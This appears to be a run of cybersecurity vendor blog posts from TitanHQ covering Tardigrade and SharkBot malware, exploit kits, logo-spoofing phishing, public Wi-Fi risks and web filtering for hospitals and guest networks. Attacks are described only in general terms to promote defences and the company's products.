Defending against attacks requires an advanced antispam solution that is not reliant on antivirus engines to detect malicious files. Antivirus engines are effective at blocking known malware variants, but not against previously undetected variants. Since Tardigrade malware is metamorphic, machine learning technology and sandboxing are required to block samples that are not detected as malicious by AV engines. Antivirus software should be installed on all devices which is capable of behavioral analysis, as the malware itself may not be detected as malicious.
A web filter should be installed and should be configured to block downloads of executable files from the Internet, such as .js, .com, .exe, and .bat files. It is also important to raise awareness of the threat of malicious messages with the workforce and teach all employees how to identify phishing emails. Training should cover cybersecurity best practices and inform employees about the procedures to follow if a suspicious email is received. Spear phishing attacks will likely be conducted on key targets. It is therefore recommended to review LinkedIn and other social media posts to identify individuals who may be targeted.
Network segmentation is vital for preventing the spread of Tardigrade malware. In the event of a device being compromised, network segmentation will limit the harm that can be caused. Tests should be run to ensure that corporate, guest, and operational networks are properly segmented. All firms in the biomanufacturing sector should identify their most sensitive data and ensure that it is appropriately protected, and all key infrastructure should be regularly backed up, with backups stored offline. BIO-ISAC also recommends inquiring about lead times for key bio-infrastructure components that need to be replaced
A new Android banking Trojan named SharkBot has been identified that has capabilities that go beyond most mobile banking Trojans.
This new Android malware stands out due to its use of an Automatic Transfer System (ATS) technique that allows it to bypass multi-factor authentication controls and automate the process of stealing funds from victims’ accounts. In order to steal funds from accounts, most Trojans require human input. SharkBot keeps human interaction to a minimum by auto-filling fields, such as those that need to be completed to make money transfers.
SharkBot can intercept SMS messages, such as those containing multi-factor authentication codes sent by financial institutions, and can hide those SMS messages to make it appear that they have not been received. SharkBot can also perform overlay attacks, where a benign pop-up is displayed over an application to trick a user into performing tasks, such as giving permissions. SharkBot is also a keylogger and can record and exfiltrate sensitive information such as credentials to the attacker’s command and control server and bypasses the Android doze component to ensure it stays connected to its C2 servers.
The malware has been configured to steal money from bank accounts and cryptocurrency services in the United States, United Kingdom, and Italy, and targets 27 financial institutions – 22 banks and 5 cryptocurrency apps.
During installation, the user is bombarded with popups to give the malicious app the permissions it needs, with those popups only stopping appearing if the user provides the required permissions, which include enabling Accessibility Services. When the malicious app is installed, the app’s icon is not displayed on the home screen. Users are prevented from uninstalling the malware via settings by abusing Accessibility Services.
The ATS technique used by the malware allows it to redirect payments. When a user attempts to make a bank transfer, information is auto-filled to direct payments to an attacker-controlled account, unbeknown to the victim.
The malware was analyzed by researchers at Cleafy, who found no similarities with any other malware variants. Since the malware has been written from scratch, it currently has a low detection rate. The researchers believe the malware is still in the early stages of development, and new capabilities could well be added to make it an even bigger threat.
One of the main problems for developers of malware targeting Android devices is how to get the malware installed on a device. Google performs checks of all apps available before adding them to the Google Play Store, so getting a malicious app on the Play Store is difficult. Even if that is achieved, Google is quick to identify and remove malicious apps.
SharkBot has been identified masquerading as a variety of apps such as an HD media player, data recovery app, and live TV streaming app, which is delivered via sideloading on rooted devices and by using social engineering techniques on compromised or attacker-owned websites to convince victims to download the fake app.
SharkBot uses a wide range of techniques to prevent detection and analysis, including obfuscation to hide malicious commands, an anti-emulator to check if it has been installed on a real device, by downloading malicious modules once it has been installed, and by encrypting all communications between the malware and the C2 servers.
Users of mobile phones tend not to be as cautious as they are with laptops and computers, but the same cybersecurity best practices should be followed. It is important to avoid clicking hyperlinks in emails and to only download apps from official app stores. The malware also serves as a reminder that while multi-factor authentication is an effective security measure, it is not infallible.
2021 has been a particularly bad year for cyberattacks. There are still 6 weeks of 2021 left, but there have already been more publicly reported data breaches than in all of 2020, according to the Identity Theft Resource Center (ITRC). 2020 was a record-breaking year for cyberattacks, and that record looks set to be beaten once again.
ITRC said supply chain attacks increased by 42% in the first quarter of 2021, ransomware attacks have been occurring at record levels, and phishing attacks remain a constant threat. It is not just the number of data breaches being reported that I a cause for concern, but also the severity of those breaches.
This year has seen several high-profile attacks, including the ransomware attack on Colonial Pipeline in the United States that disrupted fuel supplies to the East Coast for a week, and a ransomware attack on the Irish Department of Health and the Health Service Executive in May 2021, which resulted in data theft and major disruption to healthcare services.
Attacks on critical infrastructure have a devastating impact on people businesses can suffer catastrophic losses. Given the current threat level and frequency at which data breaches are being reported, it has never been more important to invest in cybersecurity.
Cybersecurity is now a priority for Irish businesses following a series of devastating cyberattacks in the country. Those attacks have hammered home the message that all Irish companies need to take steps to improve their defenses and keep hackers at bay.
Think Business, Ireland has recently raised awareness of the risk of cyberattacks and is helping businesses in the country find the solutions they need, by highlighting the excellent work being conducted by Irish cybersecurity firms. Many cybersecurity firms have a base in Ireland, with the country producing some incredible homegrown cybersecurity talent in the form of consultants, security experts, and companies that offer cutting-edge cybersecurity solutions that are protecting companies and data all around the world.
To help Irish businesses find companies that can meet their cybersecurity needs, Think Business, Ireland recently compiled a list of the top Irish 26 cybersecurity companies to watch out for in 2021 and beyond, with the report highlighting the wide range of cybersecurity solutions that have been developed by innovative Irish companies that are making their mark on the global stage.
The list includes TitanHQ, a Galway-based cybersecurity firm that has been developing innovative security solutions for 25 years. TitanHQ’s award-winning email security, web security, and email archiving solutions are now used by more than 12,000 businesses in over 150 countries, with more than 2,500 managed service providers using the solutions to protect their own and their clients’ networks from cyber threats such as malware, ransomware, viruses, botnets, and phishing.
While many businesses have been struggling through the pandemic, TitanHQ has gone from strength to strength and has continued to enjoy impressive growth. Investment from Livingbridge investor group has helped the company invest even more in product development and people and over the past 18 months, the company has doubled its workforce to more than 90 employees.
TitanHQ solutions have been developed to be easy to implement and use by all businesses and, importantly, the solutions were built from the ground up by managed service providers to help MSPs better protect their clients. The solutions save MSP’s support and engineering time by stopping problems at the source and are easy to fit into existing service stacks. That’s part of the reason why TitanHQ is now the leading provider of cloud-based cybersecurity solutions to MSPs serving the SMB market.
“We are delighted to be listed next to some of the biggest names in the Irish cybersecurity space,” said Ronan Kavanagh, CEO, TitanHQ. “As the threat landscape continues to be a significant risk to organizations across the globe, we are dedicated to continuous innovation to provide consistent, secure, and reliable protection to our customers.”
Left to Right: Ronan Kavanagh, CEO, Diane Wright, people operations manager, Sean Morris, chief technical officer, Gina Mc Grath, digital marketing executive, and Dryden Geary, marketing director.
Exploit kits first emerged in 2006 and have since been used as an automated method of malware delivery. Exploit kits are programs that are loaded onto websites that contain exploits for known vulnerabilities. When a visitor lands on a web page that hosts an exploit kit, it performs a scan to determine if certain software vulnerabilities have not been patched. If an unpatched vulnerability is identified, the exploit kit will choose an exploit and will deliver a malware payload with no user interaction required.
Exploit kits became hugely popular with threat actors between 2010 and 2017, and while their use has declined to a fraction of the level seen in 2016 and 2017, they do still pose a threat. There are several exploit kits still being used that are regularly updated with new exploits for known vulnerabilities, and over the past couple of years they have mostly been used to deliver malware loaders that deliver ransomware.
The Fallout exploit kit for example has been used to deliver Maze Locker ransomware, and the Magnitude EK, which was first identified in 2013, is also being used to deliver ransomware, mostly in the Asia Pacific region.
Exploit kits are loaded on legitimate websites that have been compromised, as well as attacker-owned websites, with traffic to the latter often delivered through malicious adverts (malvertising). It is therefore easy to land on a site hosting an exploit kit through general web browsing.
The Magnitude EK is now one of the most extensively used exploit kits which, until recently, was only being used to target Internet Explorer; however, the exploit kit has now been updated and is being used to target Chromium-based web browsers on Windows PCs.
Avast reports that two new exploits have recently been added to the Magnitude EK, one of which targets a vulnerability in Google Chrome – CVE-2021-21224 – and the other targets the Windows kernel memory corruption vulnerability tracked as CVE-2021-31956. The Google Chrome bug is a remote code execution vulnerability, and the Windows bug can be exploited to bypass the Chrome sandbox, allowing an attacker to gain system privileges.
Patches have been released by Google and Microsoft to address both of these flaws; however, the reason why exploit kits are still an effective method of malware distribution is many people delay or ignore software updates. While the Magnitude EK is not believed to be currently exploiting the vulnerabilities to deliver a malware payload, it is unlikely that will remain the case for long.
The best defense against exploit kits is to ensure that software updates and patches are applied promptly, although that is not always possible for businesses and sometimes some devices are missed and remain vulnerable. An additional measure that can protect against exploit kits and other types of web-based malware distribution is a web filter.
Web filters are the Internet equivalent of spam filters. Just as a spam filter prevents the delivery of emails containing malware to inboxes, web filters prevent malware delivery via malicious websites and are a key component of anti-phishing defenses, preventing end-users from visiting websites hosting phishing kits.
TitanHQ has developed WebTitan to protect businesses from web-based threats and carefully control the content that can be accessed by office-based and remote workers. WebTitan is a DNS-based web filter that is quick and easy to implement, which has no impact on page load speeds. WebTitan is used by more than 12,000 businesses and managed service providers for content filtering, blocking malware delivery via the internet, and as an additional security measure to block phishing attacks.
If you want to improve protection against malware, malicious sites, phishing sites, C2 callbacks, ransomware, botnets, spyware, and viruses, give the TitanHQ team a call or put the solution to the test in your own environment by taking advantage of a 100% free 14-day trial of the full solution.
If you want to keep your computers and networks protected from malware, it is important to train your staff on how to identify a malicious website. You should also install a powerful web filtering solution to ensure your employees’ malicious website identification skills are never put to the test.
Cybercriminals are developing ingenious ways of compromising networks
Scammers and cybercriminals used to mainly send out emails with infected attachments. Double-clicking on the attachment would result in the computer, and possibly the network, being infected with malware. Oftentimes, this action would go undetected by anti-virus software programs. A full system scan would need to be conducted before the malicious software was identified.
Computer users are now much wiser and know never to open file attachments that have been sent to them by unknown individuals, and certainly never to double click on an executable file. Hackers and other cybercriminals have therefore needed to get smarter, and are now developing ever more sophisticated ways of obtaining user credentials and getting people to install malware manually. One of the ways they are doing this is by developing malicious websites.
End users are contacted via email and are sent links to websites along with a valid reason for visiting the site. Links to malicious websites are also frequently sent out in social media posts or are placed in third-party website adverts. Some sites are hijacked and visitors are redirected to fake sites automatically.
Protect your customers from web-based threats such as drive-by downloads, exploit kits, and phishing. Book a FREE WebTitan demo. Book Free Demo
What is a malicious website?
Malicious websites host malware or are used to phish for sensitive information. In the case of the latter, users are tricked into revealing sensitive data such as login credentials for online banking websites.
Malware may require some user interaction before it is installed. Visitors may be tricked into downloading a security program, for instance, by being informed their computer is already infected with malware. They may be offered a free screensaver or asked to download a fake PDF invoice.
Increasingly, malicious websites are used to host exploit kits. Exploit kits probe visitors’ browsers to identify security vulnerabilities that can be exploited without any user interaction required. If a vulnerability is detected, malware can be installed automatically on the computer or network. This method of cyberattack is called a drive-by download. Drive-by downloads can involve malware being installed onto the computer’s hard drive, a network drive, or even loaded into the computer’s memory.
Learning how to identify a malicious website is important if you want to prevent your computer from being infected, and it is essential for system administrators and other IT professionals to conduct staff training to help end users avoid these dangerous sites.
How to identify a malicious website
There are some easy ways to tell if a website is attempting to install malware:
The website asks you to download software, save a file, or run a program
Visiting the website automatically launches a download window
You are asked to download an invoice or receipt, such as a PDF file, .zip or .rar, or an executable file or .scr screensaver file
A malicious website may also tell you:
Your computer is already infected with malware
Your plug-ins or browser are out of date
You have won a competition or free prize draw. You may also be offered free money or vouchers that require you to enter your credit card or banking information
If you are asked to download any files or update your software, conduct a check of the site via Google and try to determine whether the site is genuine. If in doubt, do not download any files.
If you are told your browser is out of date, visit the official browser website and check your version number. Only ever download updates from official websites.
If you have accidentally visited a drive-by download site, by the time that you have connected it may be too late to prevent malware from being downloaded. To protect against drive-by downloads you must ensure that your browser, add-ons, and plugins are 100% up to date. You should also use a software solution to block access to drive-by download sites.
Protection from web-based threats and precision Internet content control for your workforce. Book a FREE WebTitan demo. Book Free Demo
How to block end users from visiting a malicious website
Even legitimate websites can be hacked and used to host malicious code. They may use advertising networks that are used by cybercriminals to direct visitors to malware-hosting websites. The best defense is to block these adverts and malicious websites.
Blocking access to malicious websites is a simple process. All it requires is a powerful web filtering solution to be installed. WebTitan web filtering solutions for the enterprise will help you keep your network secure by preventing users from visiting sites known to host malware.
WebTitan incorporates a range of measures to detect malicious web content to prevent employees from visiting dangerous websites. WebTitan can also be configured to block access to questionable or illegal content to enforce an organization’s acceptable Internet usage policy.
If employees are trained on malicious website identification and web filtering software is installed, your network will be much better protected from malware infections and other web-based threats.
FAQs on Guest Wi-Fi Network Security and Blocking Malicious Websites
Should I enable guest Wi-Fi?
By enabling guest Wi-Fi, you are creating a separate network for guest users to access the Internet. This is much more secure than allowing a guest user to connect to your main business network. Be aware that your guest Wi-Fi network is still connected to your business so you should control the activities that can be performed while connected.
Are guest Wi-Fi networks secure?
A guest Wi-Fi network keeps guest users away from your servers and company data. While connected to the guest network, individuals will be prevented from accessing your internal resources even if they are able to locate them. If you do not have a separate guest network, you will be at risk of hacking and data theft.
How can I make my guest Wi-Fi network secure?
You can make your guest Wi-Fi network more secure by changing the name of the network (SSID) to something less obviously tied to your business, setting a strong password, and configuring the network to prevent access to local network resources. You should also implement a web filter to prevent users from accessing malicious web content.
Is web filtering complicated?
Setting up content filtering on a wired or wireless network is easy with a cloud-based web filter. Simply change your DNS settings to point to the service provider and you can be blocking threats and restricting access to web content in minutes. You will get a web-based interface to log in and can simply click on the categories of content you want to block.
How much does a web filtering solution cost?
There are many different providers of Wi-Fi filtering solutions and the cost can vary considerably. You could end up paying upwards of $2.50 per user per month; however, solutions such as WebTitan Cloud for Wi-Fi will give you the protection you need at a very reasonable cost, which can be as little as $1 per user, per month. To find out the cost, use our cost calculator.
Phishers are constantly changing their tactics, techniques, and procedures to evade security solutions and fool end users into disclosing sensitive information or installing malware. One of the most commonly used tactics is to impersonate trusted companies, with emails often including corporate logos, footers, and even correct contact information to make the messages look like genuine communications from the spoofed companies.
Email security solutions are now much better at detecting these scam emails. Email security solutions use the email security protocols SPF, DKIM, and DMARC to detect and block email impersonation attacks. SPF – Sender Policy Framework – restricts who can send emails from a corporate domain and prevents domain spoofing. DKIM – DomainKeys Identified Mail –protects against emails being tampered with, while DMARC – Domain-based Message Authentication – works in conjunction with SPF and DKIM to protect against email spoofing attacks, by linking a domain name with the name in the From: email header. This allows messages to be identified as malicious when they are sent by an unauthorized user of a domain.
Machine-learning technology and AI are used to distinguish genuine communications from spoofed messages. Some email security solutions can perform checks of corporate logos in email messages and compare these to the sender’s address to make sure the emails have come from an official source.
One phishing campaign has been detected that attempts to circumvent these AI protections by using corporate logos that have had mathematical symbols inserted to replace existing letters. Checks of these images will not alert AI-based email security solutions to a fake message, since the spoofed email messages do not contain the official corporate logo. The logos are, however, sufficiently similar to the genuine logo to fool end users.
One example of this was found in an email spoofing Verizon. The official Verizon logo has a red V, which has been substituted for a red square root symbol. These emails attempt to trick the recipients into clicking a link in the email which directs them to a website that also spoofs the brand. They are then asked to provide credentials to verify their identity. Those credentials are then captured by the scammers.
The Verizon phishing email uses a fake voicemail message as a lure, then asks the user to enter their Office 365 credentials to access the voicemail message. While that is an obvious red flag as Verizon does not require Office 365 credentials, individuals who failed to identify the email for the scam it is maybe fooled, after all, the phishing page accurately spoofs the official Verizon website.
While many spoofed emails will be blocked by SPF, DKIM, and DMARC, machine learning technology, and other checks employed by email security solutions, email security gateways are not 100% effective. For example, independent tests have shown SpamTitan has a very high detection rate – in excess of 99.97% – but a small number of emails will bypass defenses on occasion and that is true of all email security solutions.
This is why it is also recommended to implement a web filtering solution. Web filters tackle phishing from a different angle. Instead of blocking the message, they block attempts by end users to visit malicious links in emails.
TitanHQ’s web filtering solution – WebTitan – is a DNS-based web filter. When a request is made to visit a website, WebTitan performs a check at the DNS lookup stage of the request, before any content is downloaded. If the request is for a known malicious website or URL that violates an organization’s policies, the request is denied, and the user is protected. WebTitan is constantly updated to include malicious web content through multiple threat intelligence feeds to provide zero-minute protection.
Phishing attacks are becoming much more sophisticated, and while email security solutions will block the majority of attacks, phishing defenses now need to consist of multiple overlapping layers of security. By implementing a spam filter, web filter, antivirus software, and providing regular security awareness training, businesses can mount a formidable defense against phishing attacks.
For more information about web filters, contact TitanHQ today. All TitanHQ solutions are available on a free trial to allow potential customers to try before they buy with no obligation to proceed. Product demonstrations can also be provided on request.
Many employees access their work emails and work networks via public Wi-Fi hotspots, even though there is a risk that sensitive information such as login credentials could be intercepted by hackers. Many employees are unaware of the Wi-Fi security threats that lurk in their favorite coffee shop and fail to take precautions. Even employees who are aware of Wi-Fi security threats often ignore the risks.
This was highlighted by a 2017 survey by Symantec. 55% of survey participants said they would not hesitate to connect to a free Wi-Fi hotspot if the signal was good and 46% said they would rather connect to a free, open wireless network than wait to get a password for a secure access point.
60% of survey participants believed public Wi-Fi networks are safe and secure but even though 40% are aware of the Wi-Fi security threats, 87% said that they would access financial information such as their online banking portal or view their emails on public Wi-Fi networks.
The majority of users of public Wi-Fi networks who were aware of the Wi-Fi security threats said they ignored the risks. Millennials were the most likely age group to ignore Wi-Fi security threats: 95% of this age group said they had shared sensitive information over open Wi-Fi connections.
Consumers may be willing to take risks on public Wi-Fi networks, but what about employees? According to a 2018 Spiceworks survey, conducted on 500 IT professionals in the United States, employees are also taking risks.
61% of respondents to the survey said their employees connect to public Wi-Fi hotspots in coffee shops, hotels, and airports to work remotely. Only 64% of respondents said their employees were aware of the security threats on Wi-Fi. A similar percentage said their employees were aware of the risks and connect to their work networks using a VPN, which means that 4 out of 10 workers were unaware of the importance of establishing a secure connection.
Even though 64% of respondents were confident that employees were aware of the risks, only half were confident that data stored on mobile devices was adequately protected against threats from public Wi-Fi hotspots. 12% of respondents said they have had to deal with a public Wi-Fi-related security incident, although a further 34% were not sure if there had been a security breach as many incidents are never reported.
Protection from web-based threats and precision Internet content control for your workforce. Book a FREE WebTitan demo. Book Free Demo
WiFi Security Threats Everyone Should be Aware of
All employers should now be providing security awareness training to their employees to make the workforce more security-aware. Employees should be trained how to identify phishing attempts, warned of the risk from malware and ransomware, and taught about the risks associated with public Wi-Fi networks.
Five threats associated with open public Wi-Fi hotspots are detailed below:
Evil Twins – Rogue Wi-Fi Hotspots
One of the most common ways of obtaining sensitive information is for a cybercriminal to set up an evil twin hotspot. This is a fake Wi-Fi access point that masquerades as the legitimate access point, such as one offered by a coffee shop or hotel. An SSID could be set up such as “Starbuck Guest Wi-Fi” or even just state the name of the establishment. Any information disclosed while connected to that hotspot can be intercepted.
Using a packet sniffer, a hacker can identify, intercept, and monitor web traffic over unsecured Wi-Fi networks and capture personal information such as login credentials to bank accounts and corporate email accounts. If credentials are obtained, a hacker can gain full control of an account.
Many people have file-sharing enabled on their devices. This feature is useful at home and in the workplace, but it can easily be abused by hackers. It gives them an easy way to connect to a device that is connected to a Wi-Fi hotspot. A hacker can abuse this feature to drop malware on a device when it connects to a hotspot.
Protect your customers from web-based threats such as drive-by downloads, exploit kits, and phishing. Book a FREE WebTitan demo. Book Free Demo
Not all threats are hi-tec. One of the simplest methods of obtaining sensitive information is to observe someone’s online activities by looking over their shoulder. Information such as passwords may be masked so the information is not visible on a screen, but cybercriminals can look at keyboards and work out the passwords when they are typed.
Malware and Ransomware
When connecting to a home or work network, some form of anti-malware control is likely to have been installed, but those protections are often lacking on public Wi-Fi hotspots. Without the protection of AV software and a web filter, malware can be silently downloaded.
Employers can reduce risk by providing comprehensive training to employees to make sure they are aware of the risks from public Wi-Fi hotspots and make sure that employees are aware they should only connect to public Wi-Fi networks if they use a VPN. Employers can further protect workers with WebTitan Cloud – An enterprise-class web filter that protects workers from online threats, regardless of where they connect.
Hotspot providers can protect their customers by securing their Wi-Fi hotspots with WebTitan Cloud for Wi-Fi. WebTitan Cloud for Wi-Fi is a powerful web filter that protects all users of a hotspot from malware and phishing attacks, and can also be used to control the types of sites that can be accessed. If you offer Wi-Fi access, yet are not securing your hotspot, your customers could be at risk.
Contact TitanHQ today to find out how you can protect your customers from online threats, control the content that can be accessed via your Wi-Fi network, and discover how quick and easy it is to create a family-friendly Wi-Fi environment.
Hospitals often invest heavily in solutions to secure the network perimeter, although the importance of Internet and WiFi filtering in hospitals is often misunderstood. Network and software firewalls are essential, but alone they will not provide protection against all attacks. As healthcare IT security staff know all too well, the actions of employees can see cybersecurity defenses bypassed.
A look at the Department of Health and Human Services’ Office for Rights breach portal shows just how many cyberattacks on hospitals are now occurring. Cybercriminals are targeting healthcare organizations due to the value of protected health information (PHI) on the black market. PHI is worth ten times as much as credit card information, so it is no surprise that hospitals are in cybercriminals’ crosshairs. Even a small hospital can hold the PHI of more than 100,000 individuals. If access is gained to a hospital network, the potential rewards for a hacker are considerable.
There has also been a massive increase in ransomware attacks. Since hospitals need access to patients’ PHI, they are more likely to pay a ransom to regain access to their data than in other industry sectors. Hollywood Presbyterian Medical Center paid $17,000 for the keys to unlock its files following a ransomware attack in February 2016. It was one of several hospitals to give in to attackers’ demands following ransomware attacks.
A Web Filter is an Important Extra Security Layer to Protect Against Phishing Attacks
Phishing is one of the main threats for healthcare organizations, so it is vital for the email system to be secured with an advanced spam filtering solution and for security awareness training to be provided to employees. However, layered defenses are required to reduce the threat of phishing to a reasonable and acceptable level.
A web filtering solution is an important additional control in the fight against phishing. If an employee clicks on a hyperlink in a phishing email that has made it past email security defenses, the phishing website can be blocked. Instead, the user will be directed to a block screen and a potential account compromise can be avoided. A web filter will also help to protect users from malicious redirects when browsing the internet.
Protect your customers from web-based threats such as drive-by downloads, exploit kits, and phishing. Book a FREE WebTitan demo. Book Free Demo
The Hospital WiFi Environment is a Potential Gold Mine for Cybercriminals
Another common weak point is the WiFi network. IT security teams may have endpoint protection systems installed, but often not on mobile devices that connect to WiFi networks. The increasing number of wireless devices that are now in use in hospitals increases the incentive for cybercriminals to attempt to gain access to WiFi networks. Not only do physicians use mobile phones to connect to the networks and communicate PHI, but there are also laptops, tablets, and an increasing number of medical devices connected to WiFi networks. As the use of mobile and IoT devices in healthcare continues to grow, the risk of attacks on the WiFi environment will increase.
Patients also connect to hospital WiFi networks, as do visitors to hospitals. They too need to be protected from malware and ransomware when connected to hospital guest WiFi networks. One of the easiest ways to protect the devices that connect to WiFi networks is a web filtering solution. A web filter allows IT teams to carefully control the types of content that can be accessed on hospital WiFi networks, block malware downloads, and prevent all users from visiting malicious websites. Internet and WiFi filtering in hospitals should be included in cybersecurity defenses to reduce the risk of malware downloads from the internet and is an important additional control against insider breaches.
Internet and WiFi filtering in Hospitals is Not Just About Blocking Cyberthreats
Malware, ransomware, hacking, and phishing prevention aside, there are other important reasons for implementing Internet and WiFi filtering in hospitals.
Guest WiFi access in hospitals is provided to allow patients and visitors to access the Internet; however, there is only a certain amount of bandwidth available. If Internet access is to be provided, all patients and visitors should be able to gain access. Internet and WiFi filtering in hospitals can be used to restrict access to Internet services that consume large amounts of bandwidth, especially at times when network usage is heavy. Time-based controls can be applied at busy times to block access to video streaming sites, for example, to ensure all users can enjoy reasonable Internet speeds.
It is also important to prevent patients, visitors, and healthcare professionals from accessing inappropriate website content. Internet and WiFi filtering in hospitals should include a block on adult content and other inappropriate or illegal material. Blocks can easily be placed on illegal file-sharing websites, gambling or gaming sites, or any other undesirable category of web content.
Internet and WiFi filtering in hospitals ensures WiFi networks can be used safely and securely by all users, including minors. Blocking illegal, undesirable, and age-inappropriate content is not just about protecting patients and visitors. It also reduces legal liability.
Protection from web-based threats and precision Internet content control for your workforce. Book a FREE WebTitan demo. Book Free Demo
Internet and WiFi Filtering in Hospitals Made Simple
WebTitan Cloud for WiFi is an ideal solution for Internet and WiFi filtering in hospitals. WebTitan Cloud for WiFi is cost-effective to implement, the solution requires no additional hardware or software installations, and there is no latency. Being DNS-based, setup is quick and simple. A change to the DNS settings is all that is required to start filtering the Internet.
WebTitan Cloud for WiFi is ideal for hospital systems. The solution is highly scalable and can be used to protect any number of users in any number of locations. Multiple sites can be protected from one easy-to-use web-based user interface. Separate filtering controls can be applied for different locations, user groups, or even individuals. Since the solution links in with Active Directory setting up controls for different users and departments is quick and simple. Separate content controls can easily be set for guests, visitors, and staff, including filtering controls by role.
WebTitan Cloud for WiFi supports blacklists, whitelists, and allows precision content control via category or keyword, and blocks phishing websites and sites known to host exploit kits and malware. In short, WebTitan Cloud for WiFi gives you control over what users can do when connected to your WiFI network.
To find out more about WebTitan Cloud for WiFi, details of pricing, contact the TitanHQ team today.
Regardless of whether you run a hotel, coffee shop, or retail outlet, Internet access is expected by customers, but make sure you secure guest WiFi for business visitors. Providing business visitors and customers with access to the Internet brings many benefits, but if you do not secure guest WiFi for business visitors you will be exposing yourself – and them – to considerable risk. If you offer secure guest WiFI access, all users will be protected from malware, ransomware, and phishing when connected to the network. That can be a good selling point for businesses. It also shows you care about your customers.
Protect your customers from web-based threats such as drive-by downloads, exploit kits, and phishing. Book a FREE WebTitan demo. Book Free Demo
Why Is Providing Internet Access so Important?
In 2013, one study revealed that 80% of customers in retail outlets felt the provision of free WiFi access would influence their purchasing decisions. If retailers provide guest WiFi access, they are likely to encourage more potential customers into their stores and get more sales opportunities.
With more people purchasing online, businesses need to adapt. Customers want to be able to check online before making a purchase or signing up for a service, such as reading online reviews. Fail to offer Internet access and customers are more likely to leave and make a purchase at another time. Chances are that sales will be made elsewhere. Keep them in your store and allow them to access the internet and your chances of achieving a sale will be increased. Of course, if you are unable to compete with online retailers – Amazon for example – you could provide free WiFi but block access to that website.
Why is Secure Guest WiFi for Business So Important?
There are considerable benefits to be gained from offering customers free Internet access. It is what customers want, it provides businesses with an opportunity to communicate with customers, it allows businesses to collect contact details for future marketing programs, and by monitoring the use of the Internet in-store, businesses can gain valuable customer insights and find out more about the interests of their customers. Businesses should note however that the General Data Protection Regulation (GDPR) requires consent to be obtained before any personal information is collected and used.
Giving customers and guests access to the Internet opens a business up to considerable risks. If those risks are not mitigated, guest WiFi access can prove incredibly costly. You may have trained your employees to be security-aware and have introduced policies covering allowable Internet usage, but guests, customers, and other visitors are likely to have different views about the content that can be accessed on your WiFi network.
Guests and customers could take advantage of a lack of restrictions to access inappropriate material such as pornography. Individuals could engage in morally or ethically questionable activities on a business network or even illegal activity such as copyright-infringing downloads. They may also accidentally install malware or ransomware or visit phishing websites.
Secure guest WiFi for business means protecting yourself and your customers and guest users. Secure guest WiFi for business visitors and it will ensure they are protected when connected to your network. You will be able to block man-in-the-middle attacks, malware downloads and protect against phishing attacks. By providing secure guest internet access, you will also be able to reduce legal liability.
5 Things to Consider About Secure Guest WiFi for Business Customers
If you are going to open up your network to guests, security cannot be an afterthought. Secure guest WiFi for business is a must. Before providing WiFi access, be sure to consider the points below:
Segmenting your network is important for two reasons. Secure guest WiFi for business means visitors should not be able to gain access to parts of the network used by your employees. Your business guest wireless network should be kept totally separate from the internal network used by your employees. Guest users should not be able to log on and see your network assets and confidential files and resources. Use a network firewall or create a separate VLAN for guest use and use a software firewall to protect servers and workstations from traffic from the guest network. Secondly, in the event of a malware or ransomware infection, if you segregate your network, it will greatly limit the harm caused.
Always Change Default Passwords and SSIDs
This is one of the most basic security practices, yet because of that, it is easy to forget. The Internet is littered with reports of data breaches that have occurred as a result of the failure to change default passwords. All network peripherals should have strong, unique passwords set.
It is also important to change your SSID for your WiFi network. The SSID should reflect the name of your business and it should be quite clear to your customers which is your network. Fail to do this and you make it too easy for malicious individuals to set up "evil twin" access points and lure guests onto those rogue access points and conduct man-in-the-middle attacks. You can post the SSID and password internally to make it easy for legitimate users to gain access to your network. Be sure to change your password regularly.
Keep Your Firmware Updated!
Firmware updates are issued for a reason. They correct vulnerabilities that could easily be exploited by cybercriminals to gain access to your devices and network. If those vulnerabilities are exploited, configurations can be changed for a variety of nefarious purposes. You should have policies in place that require firmware updates to be installed promptly, with checks performed monthly to ensure that all devices have been updated and no firmware updates have been missed.
Protection from web-based threats and precision Internet content control for your workforce. Book a FREE WebTitan demo. Book Free Demo
Encrypt Your Wireless Signals
You want to make it as easy as possible for your guest WiFi network to be accessed by your customers and visitors, but don’t make it too easy for hackers to spy on individuals connected to the network. Make sure you encrypt your wireless network with WPA2/WPA3 encryption.
If your router does not support WPA2 as a minimum it is time to upgrade your router’s firmware or, if that is not possible, you should buy a modern router that supports WPA3 encryption. If you fail to encrypt your WiFi, it is too easy for your bandwidth to be stolen and for data to be intercepted.
Secure Guest WiFi for Business Means Content Filtering
Secure guest WiFi for business means adding controls to limit the content that can be accessed on your WiFi network.
You should block access to adult content – which includes pornography, gambling sites, and dating sites, and also web content that is ethically or morally questionable or illegal.
A web filtering solution will also protect your customers from accidental malware and ransomware downloads and is an important anti-phishing control.
Consider using a cloud-based web filter as these require no additional hardware to be purchased. They can also be configured and maintained remotely and will not require software or firmware upgrades. In contrast to appliance-based web filters, cloud-based filters are more scalable and are more adaptable to the changing needs of your business.
Wireless Guest Network Best Practices
There are many benefits to be gained from setting up a wireless guest network but doing so introduces risks. If those risks are not managed, guest users could gain access to network resources and view or steal sensitive information. Malware may be accidentally or deliberately installed, and vulnerabilities could be introduced that could expose the network to hackers. Fortunately, following some simple wireless guest network best practices will help you with securing the WiFi network, mitigating risks, and making your wireless network as - or more - secure than your wired network.
Separate your wireless guest network from the business network – Set up a second SSID specifically for guests to use. It should not be possible for guest users to access your internal WiFi network.
Choose the SSID wisely – Choose a name that does not advertise the fact that the network belongs to your business if you want to make it harder for hackers to attack your WiFi network.
Set a secure password for guests to use – Make sure the default password is changed to ensure only authorized guests can access the network.
If possible, ensure each guest user can be identified on the network. Use a management solution that collects guest credentials as this will allow you to monitor guest behavior and gain valuable insights into how your customers are using the network. Be aware there are restrictions under GDPR and CCPA that require you to obtain consent to collect personal data and explain why the data is being collected.
Communicate your Internet usage policies to guests so they know what is allowed and prohibited while connected to your WiFi network
Use the most advanced encryption available – All modern routers and access points support WPA2 encryption. Make sure this is enabled – or WPA3 if it is supported. Avoid using WPS as it is vulnerable to brute force attempts to guess the password.
Disable admin access on wireless networks – if a hacker succeeds in gaining access to your WiFi network, this will limit the harm that can be caused.
Implement a web filtering solution – A web filter should be configured to prevent users from accessing inappropriate and malicious websites while connected to the WiFi network
Protect your customers from web-based threats such as drive-by downloads, exploit kits, and phishing. Book a FREE WebTitan demo. Book Free Demo
WebTitan Cloud for WiFi – Secure Guest WiFi for Business Users
TitanHQ has made it easy to secure guest WiFi for business users. WebTitan Cloud for WiFi is a 100% cloud-based web filter that allows businesses to carefully control the categories of web content that can be accessed by guest users.
